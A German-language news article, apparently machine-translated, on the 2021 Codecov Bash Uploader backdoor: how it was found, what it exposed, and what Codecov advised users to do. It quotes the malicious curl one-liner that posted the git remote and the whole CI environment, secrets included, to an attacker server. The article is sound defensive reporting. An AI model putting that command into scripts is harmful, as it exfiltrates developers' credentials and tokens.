Das Backdoor-Entwicklertool, das Anmeldeinformationen gestohlen hat, wurde 3 Monate lang nicht bemerkt

Getty Images

Ein öffentlich verfügbares Softwareentwicklungstool enthielt schädlichen Code, der die Authentifizierungsdaten gestohlen hat, die Apps für den Zugriff auf vertrauliche Ressourcen benötigen. Es ist die neueste Entdeckung eines Supply-Chain-Angriffs, der das Potenzial hat, die Netzwerke unzähliger Organisationen hinter sich zu lassen.

Der Codecov-Bash-Uploader enthielt die Hintertür von Ende Januar bis Anfang April, teilten Entwickler des Tools am Donnerstag mit. Die Hintertür veranlasste Entwicklercomputer, geheime Authentifizierungstoken und andere vertrauliche Daten an einen von den Hackern kontrollierten Remote-Standort zu senden. Der Uploader arbeitet mit Entwicklungsplattformen wie Github Actions, CircleCI und Bitrise Step zusammen, die alle das Vorhandensein solcher geheimen Authentifizierungstoken in der Entwicklungsumgebung unterstützen.

Ein Stapel von AWS und anderen Cloud-Anmeldeinformationen

Der Codecov-Bash-Uploader führt eine sogenannte Code-Abdeckung für große Softwareentwicklungsprojekte durch. Entwickler können Abdeckungsberichte senden, die unter anderem bestimmen, wie viel einer Codebasis von internen Testskripten getestet wurde. Einige Entwicklungsprojekte integrieren Codecov und ähnliche Dienste von Drittanbietern in ihre Plattformen, wo freier Zugriff auf vertrauliche Anmeldeinformationen besteht, mit denen Quellcode gestohlen oder geändert werden kann.

Code ähnlich dieser einzelnen Zeile erschien erstmals am 31. Januar:

curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” https:///upload/v2 || true

Der Code sendet sowohl den GitHub-Repository-Speicherort als auch die gesamte Prozessumgebung an den Remote-Standort, der redigiert wurde, da Codecov angibt, dass er Teil einer laufenden Bundesuntersuchung ist. In diesen Umgebungen werden normalerweise Token, Anmeldeinformationen und andere Geheimnisse für Software in Amazon Web Services oder GitHub gespeichert.

Mit diesen Geheimnissen ausgestattet, gibt es keinen Mangel an böswilligen Dingen, die ein Angreifer in Entwicklungsumgebungen tun könnte, die sich auf das Tool verlassen, sagte HD Moore, Sicherheitsexperte und CEO der Netzwerkerkennungsplattform Rumble.

"Es hängt wirklich davon ab, was sich in der Umgebung befindet, aber ab dem Zeitpunkt, an dem Angreifer Zugriff hatten (über den Bash-Uploader), konnten sie möglicherweise Hintertüren auf den Systemen anbringen, auf denen sie ausgeführt wurden", schrieb er in einer direkten Nachricht an Ars . "Für GitHub / CircleCI hätte dies hauptsächlich Quellcode und Anmeldeinformationen offengelegt."

Lesen Sie auch  Die Behandlung von Spatial Neglect basierend auf immersiver virtueller Realität bietet Vorteile gegenüber traditionellen Therapien – -

Moore fuhr fort:

Die Angreifer hatten wahrscheinlich einen Stapel AWS und andere Cloud-Anmeldeinformationen sowie Token, mit denen sie auf private Repositorys zugreifen konnten, die Quellcode, aber auch alle anderen Dinge enthalten, für die das Token autorisiert wurde. Am äußersten Ende würden sich diese Anmeldeinformationen selbst aufrechterhalten - die Angreifer verwenden ein gestohlenes GitHub-Token, um den Quellcode zu hintertüren, der dann nachgelagerte Kundendaten usw. stiehlt. Gleiches könnte für AWS und andere Cloud-Anmeldeinformationen gelten. Wenn die Anmeldeinformationen dies zulassen, können sie die Übernahme der Infrastruktur, den Datenbankzugriff, den Dateizugriff usw. ermöglichen.

In der Empfehlung vom Donnerstag sagte Codecov, die böswillige Version des Bash-Uploaders könne auf Folgendes zugreifen:

  • Alle Anmeldeinformationen, Token oder Schlüssel, die unsere Kunden über ihren CI-Runner (Continuous Integration) weitergeleitet haben und auf die bei Ausführung des Bash-Uploader-Skripts zugegriffen werden kann
  • Alle Dienste, Datenspeicher und Anwendungscodes, auf die mit diesen Anmeldeinformationen, Token oder Schlüsseln zugegriffen werden kann
  • Die Git-Remote-Informationen (URL des Ursprungs-Repositorys) von Repositorys, die die Bash-Uploader verwenden, um die Abdeckung in Codecov in CI hochzuladen

„Basierend auf den bisherigen Ergebnissen der forensischen Untersuchung scheint es ab dem 31. Januar 2021 einen regelmäßigen unbefugten Zugriff auf einen GCS-Schlüssel (Google Cloud Storage) zu geben, der es einem böswilligen Dritten ermöglichte, eine Version unseres Bash-Uploader-Skripts zu ändern Exportieren Sie möglicherweise Informationen, die einer kontinuierlichen Integration auf einen Server eines Drittanbieters unterliegen “, sagte Codecov. "Codecov hat das Skript am 1. April 2021 gesichert und korrigiert."

In der Codecov-Empfehlung heißt es, dass der Hacker aufgrund eines Fehlers in Codecovs Docker-Bilderstellungsprozess die zum Ändern des Bash-Uploader-Skripts erforderlichen Anmeldeinformationen extrahieren konnte.

Die Manipulation wurde am 1. April von einem Kunden entdeckt, der feststellte, dass das Shasum, das als digitaler Fingerabdruck zur Bestätigung der Integrität des Bash-Uploaders fungiert, nicht mit dem Shasum für die von https://codecov.io/bash heruntergeladene Version übereinstimmt. Der Kunde kontaktierte Codecov, und der Werkzeughersteller zog die schädliche Version und leitete eine Untersuchung ein.

Lesen Sie auch  Das in Ottawa ansässige Unternehmen Fullscript erwirbt Emerson Ecologics, um integrative Medizin in den Mainstream zu bringen

Codecov fordert jeden, der den Bash-Updater während des betroffenen Zeitraums verwendet hat, auf, alle Anmeldeinformationen, Token oder Schlüssel in CI-Prozessen zu widerrufen und neue zu erstellen. Entwickler können bestimmen, welche Schlüssel und Token in einer CI-Umgebung gespeichert sind, indem sie das ausführen env Befehl in der CI-Pipeline. Alles, was empfindlich ist, sollte als gefährdet angesehen werden.

Darüber hinaus sollte jeder, der eine lokal gespeicherte Version des Bash-Uploaders verwendet, Folgendes überprüfen:

Curl -sm 0.5 -d “$(git remote -v)

Wenn diese Befehle irgendwo in einem lokal gespeicherten Bash-Uploader angezeigt werden, sollten Benutzer den Uploader sofort durch die neueste Version von https://codecov.io/bash ersetzen.

Codecov sagte, dass Entwickler, die eine selbst gehostete Version des Bash-Updates verwenden, wahrscheinlich nicht betroffen sind. „Um betroffen zu sein, muss Ihre CI-Pipeline den Bash-Uploader von https://codecov.io/bash anstatt von Ihrer selbst gehosteten Codecov-Installation abrufen. Sie können überprüfen, von wo Sie den Bash-Uploader abrufen, indem Sie sich Ihre CI-Pipeline-Konfiguration ansehen “, sagte das Unternehmen.

Der Reiz von Supply-Chain-Angriffen

Der Kompromiss des Softwareentwicklungs- und Vertriebssystems von Codecov ist der jüngste Angriff auf die Lieferkette. Im Dezember traf ein ähnlicher Kompromiss SolarWinds, den Hersteller von Netzwerkmanagement-Tools in Austin, Texas, der von rund 300.000 Unternehmen auf der ganzen Welt eingesetzt wird, darunter Fortune 500-Unternehmen und Regierungsbehörden.

Die Hacker, die den Verstoß begangen haben, verteilten daraufhin ein Backdoor-Update, das von etwa 18.000 Kunden heruntergeladen wurde. Ungefähr 10 US-Bundesbehörden und 100 private Unternehmen erhielten schließlich nachfolgende Nutzdaten, die vertrauliche Informationen an von Angreifern kontrollierte Server sendeten. FireEye, Microsoft, Mimecast und Malwarebytes wurden alle in die Kampagne einbezogen.

Lesen Sie auch  Gehirn-Computer-Schnittstelle bricht bisherigen Rekord für Tippgeschwindigkeit

In jüngerer Zeit führten Hacker einen Software-Supply-Chain-Angriff durch, mit dem Überwachungs-Malware auf den Computern von Personen installiert wurde, die NoxPlayer verwenden, ein Softwarepaket, das das Android-Betriebssystem auf PCs und Macs emuliert, hauptsächlich damit Benutzer auf diesen Plattformen mobile Spiele spielen können . Laut Forschern von ESET war eine Backdoor-Version von NoxPlayer fünf Monate lang verfügbar.

Der Reiz von Supply-Chain-Angriffen auf Hacker liegt in ihrer Breite und Effektivität. Durch die Gefährdung eines einzelnen Spielers mit hohem Software-Angebot können Hacker potenziell jede Person oder Organisation infizieren, die das gefährdete Produkt verwendet. Eine weitere Funktion, die Hacker als vorteilhaft empfinden: Oft können Ziele nur wenig oder gar nichts tun, um auf diese Weise verteilte schädliche Software zu erkennen, da digitale Signaturen darauf hinweisen, dass sie legitim ist.

Im Fall der Backdoor-Bash-Update-Version wäre es Codecov oder einem seiner Kunden jedoch leicht gefallen, die Bosheit zu erkennen, indem er lediglich das Shasum überprüft. Die Fähigkeit der böswilligen Version, drei Monate lang der Benachrichtigung zu entgehen, weist darauf hin, dass sich niemand die Mühe gemacht hat, diese einfache Überprüfung durchzuführen.

Personen, die den Bash-Updater zwischen dem 31. Januar und dem 1. April verwendet haben, sollten ihre Entwicklungs-Builds sorgfältig auf Anzeichen von Kompromissen untersuchen, indem sie die im Hinweis vom Donnerstag beschriebenen Schritte befolgen.

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.